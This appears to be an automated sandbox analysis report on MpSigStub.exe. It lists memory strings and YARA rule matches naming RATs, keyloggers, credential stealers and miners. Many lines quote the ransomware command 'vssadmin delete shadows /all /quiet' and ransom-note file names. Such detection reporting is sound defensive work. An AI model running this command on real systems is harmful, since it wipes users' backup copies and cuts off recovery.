Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	Binary or memory string: /c vssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	Binary or memory string: /C vssadmin Delete Shadows /Quiet /All
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	Binary or memory string: vssadmin delete shadows /All]
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	Binary or memory string: Nvssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	Binary or memory string: Nvssadmin.exe Delete Shadows /All /Quiet
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	Binary or memory string: Fvssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	Binary or memory string: #vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	Binary or memory string: /c vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	Binary or memory string: /c vssadmin delete shadows /all /quiet]
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	Binary or memory string: vssadmin.exe vssadmin delete shadows / all / quiet
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	Binary or memory string: /C vssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	Binary or memory string: /C vssadmin.exe delete shadows /all /quietx
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	Binary or memory string: vssadmin.exedeleteshadows/all/quiet
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	Binary or memory string: %vssadmin.exedeleteshadows/all/quiet
Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp	Binary or memory string: vssadmindeleteshadows
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	Binary or memory string: cmd /c vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	Binary or memory string: 6vssadmin.exe delete shadows
Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp	Binary or memory string: /C vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	Binary or memory string: vssadmin delete shadows /for=c: /all /quiet
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	Binary or memory string: vssadmin delete shadows /for=d: /all /quiet
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	Binary or memory string: /c vssadmin.exe delete shadows /all /quiet]
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	Binary or memory string: vssadmindeleteshadows/all/quiet
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	Binary or memory string: !vssadmindeleteshadows/all/quiet
Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	Binary or memory string: vssadmin delete shadows

Found string related to ransomware

Show sources

Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	Binary or memory string: &act=gettext&lang=
Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	Binary or memory string: &encrypted=

May drop file containing decryption instructions (likely related to ransomware)

Show sources

Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp	Binary or memory string: HOW TO DECRYPT FILES.txt
Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	Binary or memory string: HELP_instructions.html
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	Binary or memory string: How to decrypt files.html

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 35.3.MpSigStub.exe.28bd63a2bca.206.unpack, type: UNPACKEDPE	Matched rule: Detects OilRig malware Author: Eyal Sela
Source: 35.3.MpSigStub.exe.28bd75cd186.46.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Derusbi Kernel Driver Author: Florian Roth
Source: 35.3.MpSigStub.exe.28bd69011fa.70.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
Source: 35.3.MpSigStub.exe.28bd6901bfe.72.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
Source: 35.3.MpSigStub.exe.28bd63a15c6.205.raw.unpack, type: UNPACKEDPE	Matched rule: Detects OilRig malware Author: Eyal Sela
Source: 35.3.MpSigStub.exe.28bd80b0d72.120.raw.unpack, type: UNPACKEDPE	Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 35.3.MpSigStub.exe.28bd772c1c6.109.raw.unpack, type: UNPACKEDPE	Matched rule: Keylogger component Author: Microsoft
Source: 35.3.MpSigStub.exe.28bd772c1c6.109.raw.unpack, type: UNPACKEDPE	Matched rule: Detects DNSpionage Karkoff malware Author: Florian Roth
Source: 35.3.MpSigStub.exe.28bd772c1c6.109.raw.unpack, type: UNPACKEDPE	Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: 35.3.MpSigStub.exe.28bd772c1c6.109.raw.unpack, type: UNPACKEDPE	Matched rule: Detects APT41 malware POISONPLUG Author: Florian Roth
Source: 35.3.MpSigStub.exe.28bd772c1c6.109.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HOPLIGHT malware used by HiddenCobra APT group Author: Florian Roth
Source: 35.3.MpSigStub.exe.28bd780418a.59.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 35.3.MpSigStub.exe.28bd72c6dd5.218.raw.unpack, type: UNPACKEDPE	Matched rule: This rule looks for .NET PE files that have the strings of various method names in the TitoSpecial code. Author: FireEye
Source: 35.3.MpSigStub.exe.28bd80e54d2.88.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Pupy RAT Author: Florian Roth
Source: 35.3.MpSigStub.exe.28bd80e54d2.88.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: 35.3.MpSigStub.exe.28bd63ac0ae.183.raw.unpack, type: UNPACKEDPE	Matched rule: Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan) Author: Florian Roth
Source: 35.3.MpSigStub.exe.28bd63a2bca.206.raw.unpack, type: UNPACKEDPE	Matched rule: Detects OilRig malware Author: Eyal Sela
Source: 35.3.MpSigStub.exe.28bd780418a.26.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 35.3.MpSigStub.exe.28bd6408d22.17.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Molerats sample - July 2017 Author: Florian Roth
Source: 35.3.MpSigStub.exe.28bd80ae56a.119.raw.unpack, type: UNPACKEDPE	Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 35.3.MpSigStub.exe.28bd80ae56a.188.raw.unpack, type: UNPACKEDPE	Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 35.3.MpSigStub.exe.28bd69007f6.71.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
Source: 35.3.MpSigStub.exe.28bd772c9ca.108.raw.unpack, type: UNPACKEDPE	Matched rule: Keylogger component Author: Microsoft
Source: 35.3.MpSigStub.exe.28bd772c9ca.108.raw.unpack, type: UNPACKEDPE	Matched rule: Detects DNSpionage Karkoff malware Author: Florian Roth
Source: 35.3.MpSigStub.exe.28bd772c9ca.108.raw.unpack, type: UNPACKEDPE	Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: 35.3.MpSigStub.exe.28bd772c9ca.108.raw.unpack, type: UNPACKEDPE	Matched rule: Detects APT41 malware POISONPLUG Author: Florian Roth
Source: 35.3.MpSigStub.exe.28bd772c9ca.108.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HOPLIGHT malware used by HiddenCobra APT group Author: Florian Roth
Source: 35.3.MpSigStub.exe.28bd8041112.117.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 35.3.MpSigStub.exe.28bd8041112.117.raw.unpack, type: UNPACKEDPE	Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: 35.3.MpSigStub.exe.28bd6ea607c.235.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report Author: Florian Roth
Source: 35.3.MpSigStub.exe.28bd64bea82.66.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from DrqgonFly APT report Author: Florian Roth
Source: 35.3.MpSigStub.exe.28bd640a126.19.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Molerats sample - July 2017 Author: Florian Roth
Source: 35.3.MpSigStub.exe.28bd8042916.116.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 35.3.MpSigStub.exe.28bd8042916.116.raw.unpack, type: UNPACKEDPE	Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: 35.3.MpSigStub.exe.28bd6f34515.103.raw.unpack, type: UNPACKEDPE	Matched rule: HackTool_MSIL_SharPersist_2 Author: FireEye
Source: 35.3.MpSigStub.exe.28bd640b52a.18.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Molerats sample - July 2017 Author: Florian Roth
Source: 35.3.MpSigStub.exe.28bd80af96e.189.raw.unpack, type: UNPACKEDPE	Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 35.3.MpSigStub.exe.28bd80af96e.118.raw.unpack, type: UNPACKEDPE	Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 35.3.MpSigStub.exe.28bd80b0d72.190.raw.unpack, type: UNPACKEDPE	Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 35.3.MpSigStub.exe.28bd772d1ce.107.raw.unpack, type: UNPACKEDPE	Matched rule: Keylogger component Author: Microsoft
Source: 35.3.MpSigStub.exe.28bd772d1ce.107.raw.unpack, type: UNPACKEDPE	Matched rule: Detects DNSpionage Karkoff malware Author: Florian Roth
Source: 35.3.MpSigStub.exe.28bd772d1ce.107.raw.unpack, type: UNPACKEDPE	Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: 35.3.MpSigStub.exe.28bd772d1ce.107.raw.unpack, type: UNPACKEDPE	Matched rule: Detects APT41 malware POISONPLUG Author: Florian Roth
Source: 35.3.MpSigStub.exe.28bd772d1ce.107.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HOPLIGHT malware used by HiddenCobra APT group Author: Florian Roth
Source: 35.3.MpSigStub.exe.28bd63ab4aa.184.raw.unpack, type: UNPACKEDPE	Matched rule: Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan) Author: Florian Roth
Source: 35.3.MpSigStub.exe.28bd7098dc6.214.unpack, type: UNPACKEDPE	Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: 35.3.MpSigStub.exe.28bd7098dc6.214.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 35.3.MpSigStub.exe.28bd63accb2.185.raw.unpack, type: UNPACKEDPE	Matched rule: Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan) Author: Florian Roth
Source: 35.3.MpSigStub.exe.28bd6afc36e.65.unpack, type: UNPACKEDPE	Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 35.3.MpSigStub.exe.28bd6697177.158.unpack, type: UNPACKEDPE	Matched rule: Detects Tofu Trojan Author: Cylance
Source: 35.3.MpSigStub.exe.28bd6697177.158.unpack, type: UNPACKEDPE	Matched rule: This rule looks for strings specific to the D programming language in combination with sections of an integer array which contains the encoded payload found within DShell Author: FireEye
Source: 35.3.MpSigStub.exe.28bd7098dc6.98.unpack, type: UNPACKEDPE	Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: 35.3.MpSigStub.exe.28bd7098dc6.98.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPE	Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPE	Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPE	Matched rule: Detects credential stealer byed on many strings that indicate password store access Author: Florian Roth
Source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPE	Matched rule: Mirage Identifying Strings Author: Seth Hardy
Source: 35.3.MpSigStub.exe.28bd7098dc6.64.unpack, type: UNPACKEDPE	Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: 35.3.MpSigStub.exe.28bd7098dc6.64.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 35.3.MpSigStub.exe.28bd745f702.85.unpack, type: UNPACKEDPE	Matched rule: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report Author: Florian Roth
Source: 35.3.MpSigStub.exe.28bd77beebe.15.unpack, type: UNPACKEDPE	Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 35.3.MpSigStub.exe.28bd77beebe.15.unpack, type: UNPACKEDPE	Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 35.3.MpSigStub.exe.28bd77beebe.15.unpack, type: UNPACKEDPE	Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 35.3.MpSigStub.exe.28bd77beebe.15.unpack, type: UNPACKEDPE	Matched rule: Mirage Identifying Strings Author: Seth Hardy
Source: 35.3.MpSigStub.exe.28bd6694af5.157.unpack, type: UNPACKEDPE	Matched rule: Detects Tofu Trojan Author: Cylance
Source: 35.3.MpSigStub.exe.28bd6694af5.157.unpack, type: UNPACKEDPE	Matched rule: This rule looks for strings specific to the D programming language in combination with sections of an integer array which contains the encoded payload found within DShell Author: FireEye
Source: 35.3.MpSigStub.exe.28bd77beebe.25.unpack, type: UNPACKEDPE	Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 35.3.MpSigStub.exe.28bd77beebe.25.unpack, type: UNPACKEDPE	Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 35.3.MpSigStub.exe.28bd77beebe.25.unpack, type: UNPACKEDPE	Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 35.3.MpSigStub.exe.28bd77beebe.25.unpack, type: UNPACKEDPE	Matched rule: Mirage Identifying Strings Author: Seth Hardy
Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE	Matched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE	Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE	Matched rule: APT_Backdoor_Win_GORAT_5 Author: FireEye
Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE	Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE	Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE	Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE	Matched rule: Red Leaves C&C left in memory, use with Volatility / Rekall Author: David Cannings
Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE	Matched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE	Matched rule: APT_Backdoor_Win_GORAT_5 Author: FireEye
Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE	Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE	Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE	Matched rule: Red Leaves C&C left in memory, use with Volatility / Rekall Author: David Cannings
Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE	Matched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE	Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE	Matched rule: APT_Backdoor_Win_GORAT_5 Author: FireEye
Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE	Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE	Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE	Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE	Matched rule: Red Leaves C&C left in memory, use with Volatility / Rekall Author: David Cannings
Source: 00000023.00000003.6336769092.0000028BD7D54000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Crypto Miner strings Author: Florian Roth
Source: 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: 9002 Identifying Strings Author: Seth Hardy
Source: 00000023.00000003.6278239354.0000028BD7D54000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 00000023.00000003.6283306166.0000028BD6B04000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 00000023.00000003.6343112775.0000028BD6735000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Tofu Trojan Author: Cylance
Source: 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Webshells Auto-generated - file vanquish.exe Author: Yara Bulk Rule Generator by Florian Roth
Source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Strings identifying the core REDLEAVES RAT in its deobfuscated state Author: USG
Source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Ham_backdoor Author: Cylance Spear Team
Source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Red Leaves malware, related to APT10 Author: David Cannings
Source: 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000023.00000003.6341363005.0000028BD7DAE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf-psh.vba Author: Florian Roth
Source: 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: 00000023.00000003.6298208897.0000028BD6B04000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CVE_2018_4878_0day_ITW Author: unknown
Source: 00000023.00000003.6324858901.0000028BD71BA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects a ZxShell - CN threat group Author: Florian Roth
Source: 00000023.00000003.6287398810.0000028BD6B04000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 00000023.00000003.6327648470.0000028BD7D54000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Keylogger component Author: Microsoft
Source: 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: 00000023.00000003.6307889726.0000028BD7137000.00000004.00000001.sdmp, type: MEMORY	Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Mirage Identifying Strings Author: Seth Hardy
Source: 00000023.00000003.6348467864.0000028BD78B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 00000023.00000003.6432796132.0000028BD7D95000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Red Leaves C&C left in memory, use with Volatility / Rekall Author: David Cannings
Source: 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: 00000023.00000003.6264910076.0000028BD7D54000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
Source: 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects unspecified malware sample Author: Florian Roth
Source: 00000023.00000003.6348949380.0000028BD7D54000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 00000023.00000003.6295229489.0000028BD65FD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 00000023.00000003.6308819602.0000028BD71FC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000023.00000003.6337514171.0000028BD6735000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Tofu Trojan Author: Cylance
Source: 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects export from Gold Dragon - February 2018 Author: Florian Roth
Source: 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: 00000023.00000003.6304347628.0000028BD6F26000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HackTool_MSIL_SharPersist_2 Author: FireEye
Source: 00000023.00000003.6310027848.0000028BD8082000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 00000023.00000003.6430632622.0000028BD7C8D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 00000023.00000003.6292138132.0000028BD80C5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: 00000023.00000003.6282034966.0000028BD78B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects OilRig malware Author: Eyal Sela
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: Metasploit Payloads - file msf-psh.vba Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: Detects Tofu Trojan Author: Cylance
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: Keylogger - generic rule for a Chinese variant Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: Strings identifying the core REDLEAVES RAT in its deobfuscated state Author: USG
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: Detects specific RedLeaves and PlugX binaries Author: US-CERT Code Analysis Team
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: Iron Panda Malware Htran Author: Florian Roth
